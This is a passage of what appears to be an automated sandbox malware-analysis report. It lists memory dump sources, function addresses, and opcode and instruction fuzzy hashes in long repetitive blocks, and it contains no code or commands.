                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: 70e7e27e416751ab1ffaa5665bb465dad03b7be8702d0c4dc8d75c268f7f4c41
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: 96B18172A083515BD308CF25C89179BF7E2FFCC310F1ACA3EA89997291D774D9459A82
                                        Function 00512138 Relevance: .3, Instructions: 284COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: 0e42b5e5b0e0a0541439eafa2f0a64a664b3851ba46136f57a5f078b48a319d4
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: 03B12A75A097118FE706EE3DC481259F7D1BFE6280F51C72EE8A5B7662E731E8818740
                                        Function 00551EE8 Relevance: .3, Instructions: 274COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 424c176d7fa65b76b9059fc3c4530633ac027233c5944e7059dbb4c587d6f538
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: 3491E875A002118BDF15CEA8DCA4BBA7FA0BF56302F194566ED04AB392D331DD0DCBA1
                                        Function 005696FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: c3fb468c839db50f7e7a7dea7437d5d615f20d8a867b5f7856a5420b0db79f0d
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: 2CB139316106099FDB19CF28C48AB657FE4FF45364F29865CE899CF2A2C735E992CB40
                                        Function 0053B198 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: abf24aea96592df5c258fd2521a3d83a628f78d456920fdb3de9ecf1cd575697
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: 7BC14A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                        Function 0054D5A8 Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: c243d90e88f75de14bc19b7f1937b6df5993e3e11dbe65b71229260fe4993b53
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 1F9158319287916AEB168B3CCC417BABBA4FFE7354F14C71AF98872491FB7185818354
                                        Function 0055D39E Relevance: .2, Instructions: 242COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: 3cd4ab7b869819bfbb72c2501335b1fd1f84b9028c23e034ee074845ae7f1a29
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 5BA14172900A19CBEB29CF55CCD1A5EBBB1FB54315F14C22AD81AE73A0D374A945CF60
                                        Function 009035F0 Relevance: .2, Instructions: 241COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f72a4e5f599e100efa492e211f5f916eec4db93845f285bf684b0166e4ee993
                                        • Instruction ID: 9886c8a820251f8bbedd517d8c1f4884ec9e435517c1a1b31a6a2c7d816b7c72
                                        • Opcode Fuzzy Hash: 6f72a4e5f599e100efa492e211f5f916eec4db93845f285bf684b0166e4ee993
                                        • Instruction Fuzzy Hash: C181D7F3E086149FF3045E24DC4577AB7E2EBD4320F1A893DDAC897790D63A88458786
                                        Function 00524288 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction ID: 43164fdfb1d2a024f87ab0bb9bdba667e21785b6651e76445e80495c97e83f8b
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: FFA16E72E083519BD308CF25C89075BF7E2EFC8710F1ACA3DA89997294D774E9419A82
                                        Function 007F3B9C Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f73c849206e13e27ebb6a0398ce09a7cfef2107afc9e31a9b76c334d8e27dab2
                                        • Instruction ID: ab40136b186e4c15b38b5f40eaacb8a4959486a17abd9da60f64f70dbf730e2f
                                        • Opcode Fuzzy Hash: f73c849206e13e27ebb6a0398ce09a7cfef2107afc9e31a9b76c334d8e27dab2
                                        • Instruction Fuzzy Hash: BC712AF3A0C3149BE3046F29EC8477AFBE6EB94720F174A3DE6C483744E67658418686
                                        Function 0085937D Relevance: .2, Instructions: 206COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad016318f305594221e8e480a3ff1fc7b0bf95913380bdd8420a4c3360b86abb
                                        • Instruction ID: b498bc7523b7d4950ed1f24b54be8e417f1eddc3caf57cc01b21c680497e99ea
                                        • Opcode Fuzzy Hash: ad016318f305594221e8e480a3ff1fc7b0bf95913380bdd8420a4c3360b86abb
                                        • Instruction Fuzzy Hash: 385128F360C2009FE3046E2DDC8577AB7DAEFD8620F1A853DEAC4C7744E979A8058656
                                        Function 008E3879 Relevance: .2, Instructions: 187COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
